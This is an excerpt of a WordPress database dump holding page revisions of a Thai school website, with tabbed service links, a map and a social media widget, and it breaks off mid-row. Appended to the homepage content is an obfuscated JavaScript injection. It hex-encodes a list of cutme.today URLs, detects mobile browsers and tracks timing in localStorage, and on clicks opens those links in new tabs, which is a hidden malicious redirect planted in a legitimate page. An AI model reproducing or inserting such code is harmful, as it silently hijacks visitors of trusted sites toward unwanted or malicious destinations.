kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:28:00','2025-09-11 07:28:00','',14,'http://pakhaeng.ssk.in.th/?p=2032',0,'revision','',0),
(2034,1,'2025-09-11 14:28:54','2025-09-11 07:28:54','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_28b6e3-b1\",\"thumbSize\":\"full\",\"ids\":[2029],\"type\":\"slider\",\"imageRatio\":\"inherit\",\"imagesDynamic\":[{\"id\":2029,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2029\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1.png\",\"width\":1500,\"height\":600}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/